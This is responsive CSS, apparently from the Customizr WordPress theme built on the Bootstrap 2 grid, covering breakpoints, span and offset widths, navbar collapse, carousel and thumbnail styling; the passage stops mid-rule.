.visible-phone { display: none !important; } .visible-tablet { display: none !important; } .hidden-desktop { display: none !important; } .visible-desktop { display: inherit !important; } @media (min-width: 768px) and (max-width: 979px) { .hidden-desktop { display: inherit !important; } .visible-desktop { display: none !important ; } .visible-tablet { display: inherit !important; } .hidden-tablet { display: none !important; } } @media (max-width: 767px) { .hidden-desktop { display: inherit !important; } .visible-desktop { display: none !important; } .visible-phone { display: inherit !important; } .hidden-phone { display: none !important; } } .visible-print { display: none !important; } @media print { .visible-print { display: inherit !important; } .hidden-print { display: none !important; } } @media (min-width: 1200px) { .row { margin-left: -30px; *zoom: 1; } .row:before, .row:after { display: table; content: ""; line-height: 0; } .row:after { clear: both; } [class*="span"] { float: left; min-height: 1px; margin-left: 30px; } .container, .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 1170px; } .span12 { width: 1170px; } .span11 { width: 1070px; } .span10 { width: 970px; } .span9 { width: 870px; } .span8 { width: 770px; } .span7 { width: 670px; } .span6 { width: 570px; } .span5 { width: 470px; } .span4 { width: 370px; } .span3 { width: 270px; } .span2 { width: 170px; } .span1 { width: 70px; } .offset12 { margin-left: 1230px; } .offset11 { margin-left: 1130px; } .offset10 { margin-left: 1030px; } .offset9 { margin-left: 930px; } .offset8 { margin-left: 830px; } .offset7 { margin-left: 730px; } .offset6 { margin-left: 630px; } .offset5 { margin-left: 530px; } .offset4 { margin-left: 430px; } .offset3 { margin-left: 330px; } .offset2 { margin-left: 230px; } .offset1 { margin-left: 130px; } .row-fluid { width: 100%; *zoom: 1; } .row-fluid:before, .row-fluid:after { display: table; content: ""; line-height: 0; } .row-fluid:after { clear: both; } .row-fluid [class*="span"] { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; float: left; margin-left: 2.56410256%; *margin-left: 2.51091107%; } .row-fluid [class*="span"]:first-child { margin-left: 0; } .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-left: 2.56410256%; } .row-fluid .span12 { width: 100%; *width: 99.94680851%; } .row-fluid .span11 { width: 91.45299145%; *width: 91.39979996%; } .row-fluid .span10 { width: 82.90598291%; *width: 82.85279142%; } .row-fluid .span9 { width: 74.35897436%; *width: 74.30578287%; } .row-fluid .span8 { width: 65.81196581%; *width: 65.75877432%; } .row-fluid .span7 { width: 57.26495726%; *width: 57.21176578%; } .row-fluid .span6 { width: 48.71794872%; *width: 48.66475723%; } .row-fluid .span5 { width: 40.17094017%; *width: 40.11774868%; } .row-fluid .span4 { width: 31.62393162%; *width: 31.57074013%; } .row-fluid .span3 { width: 23.07692308%; *width: 23.02373159%; } .row-fluid .span2 { width: 14.52991453%; *width: 14.47672304%; } .row-fluid .span1 { width: 5.98290598%; *width: 5.92971449%; } .row-fluid .offset12 { margin-left: 105.12820513%; *margin-left: 105.02182215%; } .row-fluid .offset12:first-child { margin-left: 102.56410256%; *margin-left: 102.45771959%; } .row-fluid .offset11 { margin-left: 96.58119658%; *margin-left: 96.4748136%; } .row-fluid .offset11:first-child { margin-left: 94.01709402%; *margin-left: 93.91071104%; } .row-fluid .offset10 { margin-left: 88.03418803%; *margin-left: 87.92780506%; } .row-fluid .offset10:first-child { margin-left: 85.47008547%; *margin-left: 85.36370249%; } .row-fluid .offset9 { margin-left: 79.48717949%; *margin-left: 79.38079651%; } .row-fluid .offset9:first-child { margin-left: 76.92307692%; *margin-left: 76.81669394%; } .row-fluid .offset8 { margin-left: 70.94017094%; *margin-left: 70.83378796%; } .row-fluid .offset8:first-child { margin-left: 68.37606838%; *margin-left: 68.2696854%; } .row-fluid .offset7 { margin-left: 62.39316239%; *margin-left: 62.28677941%; } .row-fluid .offset7:first-child { margin-left: 59.82905983%; *margin-left: 59.72267685%; } .row-fluid .offset6 { margin-left: 53.84615385%; *margin-left: 53.73977087%; } .row-fluid .offset6:first-child { margin-left: 51.28205128%; *margin-left: 51.1756683%; } .row-fluid .offset5 { margin-left: 45.2991453%; *margin-left: 45.19276232%; } .row-fluid .offset5:first-child { margin-left: 42.73504274%; *margin-left: 42.62865976%; } .row-fluid .offset4 { margin-left: 36.75213675%; *margin-left: 36.64575377%; } .row-fluid .offset4:first-child { margin-left: 34.18803419%; *margin-left: 34.08165121%; } .row-fluid .offset3 { margin-left: 28.20512821%; *margin-left: 28.09874523%; } .row-fluid .offset3:first-child { margin-left: 25.64102564%; *margin-left: 25.53464266%; } .row-fluid .offset2 { margin-left: 19.65811966%; *margin-left: 19.55173668%; } .row-fluid .offset2:first-child { margin-left: 17.09401709%; *margin-left: 16.98763412%; } .row-fluid .offset1 { margin-left: 11.11111111%; *margin-left: 11.00472813%; } .row-fluid .offset1:first-child { margin-left: 8.54700855%; *margin-left: 8.44062557%; } input, textarea, .uneditable-input { margin-left: 0; } .controls-row [class*="span"] + [class*="span"] { margin-left: 30px; } input.span12, textarea.span12, .uneditable-input.span12 { width: 1156px; } input.span11, textarea.span11, .uneditable-input.span11 { width: 1056px; } input.span10, textarea.span10, .uneditable-input.span10 { width: 956px; } input.span9, textarea.span9, .uneditable-input.span9 { width: 856px; } input.span8, textarea.span8, .uneditable-input.span8 { width: 756px; } input.span7, textarea.span7, .uneditable-input.span7 { width: 656px; } input.span6, textarea.span6, .uneditable-input.span6 { width: 556px; } input.span5, textarea.span5, .uneditable-input.span5 { width: 456px; } input.span4, textarea.span4, .uneditable-input.span4 { width: 356px; } input.span3, textarea.span3, .uneditable-input.span3 { width: 256px; } input.span2, textarea.span2, .uneditable-input.span2 { width: 156px; } input.span1, textarea.span1, .uneditable-input.span1 { width: 56px; } .thumbnails { margin-left: -30px; } .thumbnails > li { margin-left: 30px; } .row-fluid .thumbnails { margin-left: 0; } } @media (min-width: 768px) and (max-width: 979px) { .row { margin-left: -20px; *zoom: 1; } .row:before, .row:after { display: table; content: ""; line-height: 0; } .row:after { clear: both; } [class*="span"] { float: left; min-height: 1px; margin-left: 20px; } .container, .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 724px; } .span12 { width: 724px; } .span11 { width: 662px; } .span10 { width: 600px; } .span9 { width: 538px; } .span8 { width: 476px; } .span7 { width: 414px; } .span6 { width: 352px; } .span5 { width: 290px; } .span4 { width: 228px; } .span3 { width: 166px; } .span2 { width: 104px; } .span1 { width: 42px; } .offset12 { margin-left: 764px; } .offset11 { margin-left: 702px; } .offset10 { margin-left: 640px; } .offset9 { margin-left: 578px; } .offset8 { margin-left: 516px; } .offset7 { margin-left: 454px; } .offset6 { margin-left: 392px; } .offset5 { margin-left: 330px; } .offset4 { margin-left: 268px; } .offset3 { margin-left: 206px; } .offset2 { margin-left: 144px; } .offset1 { margin-left: 82px; } .row-fluid { width: 100%; *zoom: 1; } .row-fluid:before, .row-fluid:after { display: table; content: ""; line-height: 0; } .row-fluid:after { clear: both; } .row-fluid [class*="span"] { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; float: left; margin-left: 2.76243094%; *margin-left: 2.70923945%; } .row-fluid [class*="span"]:first-child { margin-left: 0; } .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-left: 2.76243094%; } .row-fluid .span12 { width: 100%; *width: 99.94680851%; } .row-fluid .span11 { width: 91.43646409%; *width: 91.3832726%; } .row-fluid .span10 { width: 82.87292818%; *width: 82.81973669%; } .row-fluid .span9 { width: 74.30939227%; *width: 74.25620078%; } .row-fluid .span8 { width: 65.74585635%; *width: 65.69266486%; } .row-fluid .span7 { width: 57.18232044%; *width: 57.12912895%; } .row-fluid .span6 { width: 48.61878453%; *width: 48.56559304%; } .row-fluid .span5 { width: 40.05524862%; *width: 40.00205713%; } .row-fluid .span4 { width: 31.49171271%; *width: 31.43852122%; } .row-fluid .span3 { width: 22.9281768%; *width: 22.87498531%; } .row-fluid .span2 { width: 14.36464088%; *width: 14.31144939%; } .row-fluid .span1 { width: 5.80110497%; *width: 5.74791348%; } .row-fluid .offset12 { margin-left: 105.52486188%; *margin-left: 105.4184789%; } .row-fluid .offset12:first-child { margin-left: 102.76243094%; *margin-left: 102.65604796%; } .row-fluid .offset11 { margin-left: 96.96132597%; *margin-left: 96.85494299%; } .row-fluid .offset11:first-child { margin-left: 94.19889503%; *margin-left: 94.09251205%; } .row-fluid .offset10 { margin-left: 88.39779006%; *margin-left: 88.29140708%; } .row-fluid .offset10:first-child { margin-left: 85.63535912%; *margin-left: 85.52897614%; } .row-fluid .offset9 { margin-left: 79.83425414%; *margin-left: 79.72787116%; } .row-fluid .offset9:first-child { margin-left: 77.0718232%; *margin-left: 76.96544023%; } .row-fluid .offset8 { margin-left: 71.27071823%; *margin-left: 71.16433525%; } .row-fluid .offset8:first-child { margin-left: 68.50828729%; *margin-left: 68.40190431%; } .row-fluid .offset7 { margin-left: 62.70718232%; *margin-left: 62.60079934%; } .row-fluid .offset7:first-child { margin-left: 59.94475138%; *margin-left: 59.8383684%; } .row-fluid .offset6 { margin-left: 54.14364641%; *margin-left: 54.03726343%; } .row-fluid .offset6:first-child { margin-left: 51.38121547%; *margin-left: 51.27483249%; } .row-fluid .offset5 { margin-left: 45.5801105%; *margin-left: 45.47372752%; } .row-fluid .offset5:first-child { margin-left: 42.81767956%; *margin-left: 42.71129658%; } .row-fluid .offset4 { margin-left: 37.01657459%; *margin-left: 36.91019161%; } .row-fluid .offset4:first-child { margin-left: 34.25414365%; *margin-left: 34.14776067%; } .row-fluid .offset3 { margin-left: 28.45303867%; *margin-left: 28.3466557%; } .row-fluid .offset3:first-child { margin-left: 25.69060773%; *margin-left: 25.58422476%; } .row-fluid .offset2 { margin-left: 19.88950276%; *margin-left: 19.78311978%; } .row-fluid .offset2:first-child { margin-left: 17.12707182%; *margin-left: 17.02068884%; } .row-fluid .offset1 { margin-left: 11.32596685%; *margin-left: 11.21958387%; } .row-fluid .offset1:first-child { margin-left: 8.56353591%; *margin-left: 8.45715293%; } input, textarea, .uneditable-input { margin-left: 0; } .controls-row [class*="span"] + [class*="span"] { margin-left: 20px; } input.span12, textarea.span12, .uneditable-input.span12 { width: 710px; } input.span11, textarea.span11, .uneditable-input.span11 { width: 648px; } input.span10, textarea.span10, .uneditable-input.span10 { width: 586px; } input.span9, textarea.span9, .uneditable-input.span9 { width: 524px; } input.span8, textarea.span8, .uneditable-input.span8 { width: 462px; } input.span7, textarea.span7, .uneditable-input.span7 { width: 400px; } input.span6, textarea.span6, .uneditable-input.span6 { width: 338px; } input.span5, textarea.span5, .uneditable-input.span5 { width: 276px; } input.span4, textarea.span4, .uneditable-input.span4 { width: 214px; } input.span3, textarea.span3, .uneditable-input.span3 { width: 152px; } input.span2, textarea.span2, .uneditable-input.span2 { width: 90px; } input.span1, textarea.span1, .uneditable-input.span1 { width: 28px; } } @media (max-width: 767px) { body { padding-left: 20px; padding-right: 20px; } .navbar-fixed-top, .navbar-fixed-bottom, .navbar-static-top { margin-left: -20px; margin-right: -20px; } .container-fluid { padding: 0; } .dl-horizontal dt { float: none; clear: none; width: auto; text-align: left; } .dl-horizontal dd { margin-left: 0; } .container { width: auto; } .row-fluid { width: 100%; } .row, .thumbnails { margin-left: 0; } .thumbnails > li { float: none; margin-left: 0; } [class*="span"], .uneditable-input[class*="span"], .row-fluid [class*="span"] { float: none; display: block; width: 100%; margin-left: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .span12, .row-fluid .span12 { width: 100%; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .row-fluid [class*="offset"]:first-child { margin-left: 0; } .input-large, .input-xlarge, .input-xxlarge, input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .input-prepend input, .input-append input, .input-prepend input[class*="span"], .input-append input[class*="span"] { display: inline-block; width: auto; } .controls-row [class*="span"] + [class*="span"] { margin-left: 0; } .modal { position: fixed; top: 20px; left: 20px; right: 20px; width: auto; margin: 0; } .modal.fade { top: -100px; } .modal.fade.in { top: 20px; } } @media (min-width: 480px) and (max-width: 767px) { .row-fluid .controls-row [class*="span"] + [class*="span"] { margin-left: 2.12765957%; } .row-fluid .tc-content.span12 { width: 100%; *width: 99.94680851%; float: left; } .row-fluid .tc-thumbnail.span12 { width: 100%; *width: 99.94680851%; float: left; } .row-fluid .tc-content.span11 { width: 91.4893617%; *width: 91.43617021%; float: left; } .row-fluid .tc-thumbnail.span11 { width: 91.4893617%; *width: 91.43617021%; float: left; } .row-fluid .tc-content.span10 { width: 82.9787234%; *width: 82.92553191%; float: left; } .row-fluid .tc-thumbnail.span10 { width: 82.9787234%; *width: 82.92553191%; float: left; } .row-fluid .tc-content.span9 { width: 74.46808511%; *width: 74.41489362%; float: left; } .row-fluid .tc-thumbnail.span9 { width: 74.46808511%; *width: 74.41489362%; float: left; } .row-fluid .tc-content.span8 { width: 65.95744681%; *width: 65.90425532%; float: left; } .row-fluid .tc-thumbnail.span8 { width: 65.95744681%; *width: 65.90425532%; float: left; } .row-fluid .tc-content.span7 { width: 57.44680851%; *width: 57.39361702%; float: left; } .row-fluid .tc-thumbnail.span7 { width: 57.44680851%; *width: 57.39361702%; float: left; } .row-fluid .tc-content.span6 { width: 48.93617021%; *width: 48.88297872%; float: left; } .row-fluid .tc-thumbnail.span6 { width: 48.93617021%; *width: 48.88297872%; float: left; } .row-fluid .tc-content.span5 { width: 40.42553191%; *width: 40.37234043%; float: left; } .row-fluid .tc-thumbnail.span5 { width: 40.42553191%; *width: 40.37234043%; float: left; } .row-fluid .tc-content.span4 { width: 31.91489362%; *width: 31.86170213%; float: left; } .row-fluid .tc-thumbnail.span4 { width: 31.91489362%; *width: 31.86170213%; float: left; } .row-fluid .tc-content.span3 { width: 23.40425532%; *width: 23.35106383%; float: left; } .row-fluid .tc-thumbnail.span3 { width: 23.40425532%; *width: 23.35106383%; float: left; } .row-fluid .tc-content.span2 { width: 14.89361702%; *width: 14.84042553%; float: left; } .row-fluid .tc-thumbnail.span2 { width: 14.89361702%; *width: 14.84042553%; float: left; } .row-fluid .tc-content.span1 { width: 6.38297872%; *width: 6.32978723%; float: left; } .row-fluid .tc-thumbnail.span1 { width: 6.38297872%; *width: 6.32978723%; float: left; } } @media (max-width: 480px) { .nav-collapse { -webkit-transform: translate3d(0, 0, 0); } .page-header h1 small { display: block; line-height: 20px; } input[type="checkbox"], input[type="radio"] { border: 1px solid #ccc; } .form-horizontal .control-label { float: none; width: auto; padding-top: 0; text-align: left; } .form-horizontal .controls { margin-left: 0; } .form-horizontal .control-list { padding-top: 0; } .form-horizontal .form-actions { padding-left: 10px; padding-right: 10px; } .media .pull-left, .media .pull-right { float: none; display: block; margin-bottom: 10px; } .media-object { margin-right: 0; margin-left: 0; } .modal { top: 10px; left: 10px; right: 10px; } .modal-header .close { padding: 10px; margin: -10px; } .carousel-caption { position: static; } } @media (max-width: 979px) { body { padding-top: 0; } .navbar-fixed-top, .navbar-fixed-bottom { position: static; } .navbar-fixed-top { margin-bottom: 20px; } .navbar-fixed-bottom { margin-top: 20px; } .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner { padding: 5px; } .navbar .container { width: auto; padding: 0; } .navbar .brand { padding-left: 10px; padding-right: 10px; margin: 0 0 0 -5px; } .nav-collapse { clear: both; } .nav-collapse .nav { float: none; margin: 10px 0px 4px 0px; /*margin: 0 0 (@baseLineHeight / 2);*/ } .nav-collapse .nav > li { float: none; } .nav-collapse .nav > li > a { margin-bottom: 2px; } .nav-collapse .nav > .divider-vertical { display: none; } .nav-collapse .nav .nav-header { color: #777777; text-shadow: none; } .nav-collapse .nav > li > a, .nav-collapse .dropdown-menu a { padding: 9px 15px; font-weight: bold; color: #777777; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .nav-collapse .btn { padding: 4px 10px 4px; font-weight: normal; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .nav-collapse .dropdown-menu li + li a { margin-bottom: 2px; } .nav-collapse .nav > li > a:hover, .nav-collapse .nav > li > a:focus, .nav-collapse .dropdown-menu a:hover, .nav-collapse .dropdown-menu a:focus { background-color: #f2f2f2; } .navbar-inverse .nav-collapse .nav > li > a, .navbar-inverse .nav-collapse .dropdown-menu a { color: #999999; } .navbar-inverse .nav-collapse .nav > li > a:hover, .navbar-inverse .nav-collapse .nav > li > a:focus, .navbar-inverse .nav-collapse .dropdown-menu a:hover, .navbar-inverse .nav-collapse .dropdown-menu a:focus { background-color: #111111; } .nav-collapse.in .btn-group { margin-top: 5px; padding: 0; } .nav-collapse .dropdown-menu { position: static; top: auto; left: auto; float: none; display: none; max-width: none; margin: 0 15px; padding: 0; background-color: transparent; border: none; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .nav-collapse .open > .dropdown-menu { display: block; } .nav-collapse .dropdown-menu:before, .nav-collapse .dropdown-menu:after { display: none; } .nav-collapse .dropdown-menu .divider { display: none; } .nav-collapse .nav > li > .dropdown-menu:before, .nav-collapse .nav > li > .dropdown-menu:after { display: none; } .nav-collapse .navbar-form, .nav-collapse .navbar-search { float: none; padding: 10px 15px; margin: 10px 0; border-top: 1px solid #f2f2f2; border-bottom: 1px solid #f2f2f2; -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1); -moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1); box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1); } .navbar-inverse .nav-collapse .navbar-form, .navbar-inverse .nav-collapse .navbar-search { border-top-color: #111111; border-bottom-color: #111111; } .navbar .nav-collapse .nav.pull-right { float: none; margin-left: 0; } .nav-collapse, .nav-collapse.collapse { overflow: hidden; height: 0; } .navbar .btn-navbar { display: block; } .navbar-static .navbar-inner { padding-left: 10px; padding-right: 10px; } } @media (min-width: 979px + 1) { .nav-collapse.collapse { height: auto !important; overflow: visible !important; } } /********************************************************************************* ************************* Customizr reponsive *********************************** **********************************************************************************/ /* CUSTOMIZR RESPONSIVE CSS -------------------------------------------------- */ /* Smooth resizing */ .is-customizing img, .is-customizing .container-fluid, .is-customizing .tc-footer-social-links-wrapper { -webkit-transition: width 0.15s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; -moz-transition: width 0.15s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; -o-transition: width 0.15s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; transition: width 0.15s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; } .is-customizing h1, .is-customizing h2, .is-customizing h3, .is-customizing h4, .is-customizing h5, .is-customizing h6, .is-customizing p { -webkit-transition: font-size 0.15s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; -moz-transition: font-size 0.15s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; -o-transition: font-size 0.15s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; transition: font-size 0.2s ease-in-out, left 0.15s ease-in-out, right 0.15s ease-in-out; } /* Media queries */ @media (max-width: 1200px) { /* elements */ select { width: 100%; } /*Other*/ .carousel .item { line-height: 385px; overflow: hidden; min-height: 385px; } #left .round-div { left: -77px; } /* one sidebar case (span9) */ .span9.article-container .round-div { width: 153px; height: 153px; top: -59px; left: -69px; } .span9.article-container .thumb-wrapper img { max-width: 250px; } /* two sidebars case (span9) */ .span6.article-container .round-div { width: 95px; height: 95px; top: -82px; left: -80px; } /* MENU CHANGES SINCE V3.2.0 */ .menu > li > a { font-size: 15px; line-height: 20px; } .menu > li > ul li a { font-size: 12px; } } @media (min-width: 980px) { /* ROUND DIV FOR 3 columns Top or bottom thumb position SINCE V3.2.0*/ .span6 .thumb-position-top .round-div { width: 125px; height: 125px; top: -78px; left: -33px; } /* HOVER EFFECTS ON MENU SINCE V3.2.0*/ .tc-submenu-fade .nav > li > ul { opacity: 0; top: 75%; visibility: hidden; display: block; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .tc-submenu-fade .tc-hover-menu.nav li:hover > ul, .tc-submenu-fade .nav li.open > ul { opacity: 1; top: 95%; visibility: visible; } .tc-submenu-move .dropdown-menu > li > a { -webkit-transition: all ease 0.241s; -moz-transition: all ease 0.241s; -o-transition: all ease 0.241s; transition: all ease 0.241s; } .tc-open-on-click .dropdown-submenu:hover > .dropdown-menu { display: none; } } @media (max-width: 979px) { .tc-header .outside { display: block; text-align: center; } .tc-header .brand { float: none; text-align: center; width: 100%; } .container.navbar-wrapper { margin-bottom: 0; width: auto; } .navbar.resp { display: block; } .navbar.notresp { display: none; } .navbar-wrapper.clearfix.span9 { width: 100%; margin: 0%; } .navbar-wrapper .navbar { float: none; width: 100%; } .navbar-wrapper .navbar h2 { display: none; } .navbar-inner .tc-nav-button { display: block; } .navbar .navbar-inner { padding: 0px 8px; text-align: center; position: relative; } /* Default Menu */ .nav-collapse, .nav-collapse.collapse { overflow: hidden; height: 0; position: absolute; z-index: 3000; right: 0px; top: 42px; background-color: #FAFAFA; background-image: -moz-linear-gradient(top, #ffffff, #f2f2f2); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), to(#f2f2f2)); background-image: -webkit-linear-gradient(top, #ffffff, #f2f2f2); background-image: -o-linear-gradient(top, #ffffff, #f2f2f2); background-image: linear-gradient(to bottom, #ffffff, #f2f2f2); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#fff2f2f2', GradientType=0); -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 2px 10px rgba(0, 0, 0, 0.25); -moz-box-shadow: 0 2px 10px rgba(0, 0, 0, 0.25); box-shadow: 0 2px 10px rgba(0, 0, 0, 0.25); } /* Rocco's pull request : https://github.com/Nikeo/customizr/pull/23 This should fix some weird behavior on android devices: 1) menu links still reachable despite menu is closed https://wordpress.org/support/topic/bug-when-displayed-on-samsung-tab-2-70 2) menu appears always expanded in old android's versions https://wordpress.org/support/topic/customizr-mobile-menu-always-open */ .nav-collapse.collapse .nav { display: none; } .nav-collapse, .nav-collapse.collapse.in .nav { display: block; } .nav-collapse .nav > li > a, .nav-collapse .dropdown-menu a { font-weight: normal; -webkit-border-radius: 0px; -moz-border-radius: 0px; border-radius: 0px; margin-bottom: 0px; } .nav-collapse .dropdown-menu li + li a { margin-bottom: 0px; } .nav-collapse .dropdown-menu { margin-left: 0px; margin-right: 0px; } .nav-collapse .dropdown-menu li a { padding-left: 25px; } .nav-collapse .dropdown-menu li li a { padding-left: 50px; } .nav-collapse .dropdown-menu li li li a { padding-left: 75px; } /* Hover Menu */ .nav-collapse.tc-hover-menu-wrapper { width: 100%; } .tc-hover-menu.nav ul.dropdown-menu { display: block; } .tc-hover-menu.nav li { text-align: left; position: relative; } .tc-hover-menu.nav a:after { border-top: none; border-right: none; border-left: none; } .tc-hover-menu.nav a { border-bottom: 1px solid #EEE; } .tc-hover-menu.nav .caret { display: none; } /* social blocks */ .social-block { float: left; } .social-block.widget { float: none; } .carousel .item { line-height: 309px; overflow: hidden; min-height: 309px; } .featurette { height: auto; padding: 0; } .featurette-image.pull-left, .featurette-image.pull-right { display: block; float: none; max-width: 40%; margin: 0 auto 20px; } /*featured pages */ .widget-front.hover .round-div, article.hover .round-div { -webkit-transform: scale(1.3); -moz-transform: scale(1.3); -ms-transform: scale(1.3); -o-transform: scale(1.3); transform: scale(1.3); cursor: pointer; } .widget-front .thumb-wrapper { height: 250px; width: 201px; max-width: none; } .widget-front .round-div { width: 150px; height: 150px; border: 94px solid #FAFAFA; top: -44px; left: -65px; } .thumb-wrapper { height: 250px; width: 201px; } .round-div { width: 150px; height: 150px; border: 94px solid #FAFAFA; top: -49px; left: -67px; } /* one sidebar case (span9) */ .span9.article-container .thumb-wrapper { left: 13px; } .span9.article-container .round-div { width: 125px; height: 125px; border: 94px solid #FAFAFA; top: -38px; left: -67px; } /* two sidebar case (span6) */ .span6.article-container .tc-thumbnail, .span6.article-container .tc-content { width: 100%; } .span6.article-container .round-div { top: -49px; left: -48px; } .thumb-wrapper img { min-height: initial; } .thumb-wrapper img { max-width: 236px; right: 14px; top: 15px; position: relative; } #left .round-div { left: -86px; } /* Disable the hover effect for desktop viewport SINCE V3.2.0*/ html.cssanimations.csstransitions .dropdown-menu { opacity: 1; top: 100%; visibility: visible; } .nav .dropdown-menu { -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } /* PLACE LOGO / TITLE ON THE LEFT SINCE V3.2.0 */ .sticky-enabled .brand { float: left; width: 80%; text-align: left; padding-left: 10px; position: relative; z-index: 2; } /* HIDE TAGLINE SINCE V3.2.0*/ .navbar-wrapper .navbar h2 { display: none!important; } .sticky-enabled .tc-header { min-height: 40px; } .sticky-enabled .tc-header .outside { display: none; } /* Adjust button margin SINCE V3.2.0*/ .sticky-enabled .navbar .navbar-inner { margin: 0px; } .navbar .btn-navbar { display: block; margin: 10px 0; } /* GIVE NAVBAR A SMALLER Z-index than logo / title SINCE V3.2.0*/ .sticky-enabled .navbar-wrapper { position: relative; z-index: 1; } .no-navbar .nav-collapse, .nav-collapse.collapse { /* default fallback */ background: #ffffff transparent; /* nice browsers */ background: rgba(255, 255, 255, 0.9); /* IE 6/7 */ filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#CCFFFFFF, endColorstr=#CCFFFFFF)"; /* IE8 */ -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#CCFFFFFF, endColorstr=#CCFFFFFF)"; } .no-navbar .navbar .navbar-inner { -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; background: none; } .navbar .navbar-inner .social-block { width: auto!important; float: left; margin: 14px 0 0; } /* MENU CHANGES SINCE V3.2.0 */ .navbar .nav-collapse .dropdown-menu a { padding: 3px 5px; } .navbar .nav-collapse ul.nav > li li a { padding-left: 30px; } .navbar .nav-collapse ul.nav > li li li a { padding-left: 60px; } .dropdown-submenu > a:after { content: none; } .nav a { border-bottom: 1px solid #EEE; } .nav-collapse, .nav-collapse.collapse { width: 100%; overflow-y: scroll; } .navbar .navbar-inner .nav li { text-align: left; position: relative; } .nav.nav li > ul { display: block; } /* GREY SIMPLE RESPONSIVE BUTTON MENU */ .simple-button .navbar .btn-navbar { background-image: none!important; background-color: #FFF; } .simple-button .navbar .btn-navbar:hover, .simple-button .navbar .btn-navbar:focus, .simple-button .navbar .btn-navbar:active, .simple-button .navbar .btn-navbar.active, .simple-button .navbar .btn-navbar.disabled, .simple-button .navbar .btn-navbar[disabled] { background-color: #7F7F7F; } .simple-button .navbar .btn-navbar .icon-bar { background-color: #7F7F7F; } .simple-button .navbar .btn-navbar:hover .icon-bar { background-color: #fff; } button.btn.btn-navbar { transition: all 0.1s ease-in-out; } } @media (max-width: 979px) and (min-width: 768px) { .sticky-enabled .navbar-wrapper { float: none; } } @media (max-width: 767px) { body { padding-left: 0px; padding-right: 0px; } #main-wrapper { padding-left: 10px; padding-right: 10px; } h1 { font-size: 30.4px; line-height: 30.4px; } h2 { font-size: 25.6px; line-height: 25.6px; } h3 { font-size: 19.2px; line-height: 19.2px; } h4 { font-size: 14.4px; line-height: 14.4px; } h5 { font-size: 11.2px; line-height: 11.2px; } h6 { font-size: 9.6px; line-height: 9.6px; } .span6.article-container .round-div, .span9.article-container .round-div, .span12.article-container .round-div { width: 100px; height: 100px; top: -46px; left: -78px; } .span6.article-container .thumb-wrapper img, .span9.article-container .thumb-wrapper img, .span12.article-container .thumb-wrapper img { max-width: 190px; } .thumb-wrapper { height: 200px; max-width: 131px; } .tc-content .thumb-wrapper img { right: 0px; } /* hide left sidebar */ #left.widget-area { /* display:none; */ } /*hide the border and before effect for right sidebar*/ #right.widget-area { border-left: 0px; } #right.widget-area:before { border-left: 0px; } .navbar-inner { margin: -20px; } .carousel { /* margin-left: -20px; margin-right: -20px; */ } .carousel .item { line-height: 308px; overflow: hidden; min-height: 308px; } .item .carousel-caption h1 { font-size: 22px; } .carousel-caption .btn { font-size: 16px; } .marketing .span4 + .span4 { margin-top: 40px; } .featurette-heading { font-size: 30px; } .featurette .lead { font-size: 18px; line-height: 1.5; } #left .round-div { left: -66px; } /*force comment layout to be not responsive */ .row-fluid .comment-avatar.span2 { width: 14.893617021%; float: left; margin-right: 2.762430939%; } footer#footer { text-align: center; } /* SINCE V3.2.0 */ .span6 .thumb-position-top .round-div { width: 125px; height: 125px; top: -59px; left: -63px; } .span6 .thumb-position-top .thumb-wrapper { max-width: none; } .site-title { font-size: 0.8em; } .sticky-enabled .navbar .btn-navbar { margin: 9px 0px; } } @media (max-width: 480px) { .span6.article-container .thumb-wrapper img, .span9.article-container .thumb-wrapper img, .span12.article-container .thumb-wrapper img { max-width: 222px; right: 14px; top: -9px; } .span6.article-container .thumb-wrapper, .span9.article-container .thumb-wrapper, .span12.article-container .thumb-wrapper { height: 180px; left: 0px; } .tc-content .thumb-wrapper img { right: -4px; } .thumb-wrapper { max-width: 200px; } .span6.article-container .round-div, .span9.article-container .round-div, .span12.article-container .round-div { width: 125px; height: 125px; top: -68px; left: -57px; } .navbar-inner .social-block { padding: 5px 0px 0px 0px; } .social-block a { padding-right: 10px; } .carousel .item { line-height: 190px; overflow: hidden; min-height: 190px; } .carousel-caption { padding: 2%; margin-left: 17%; position: relative; max-height: 130px; 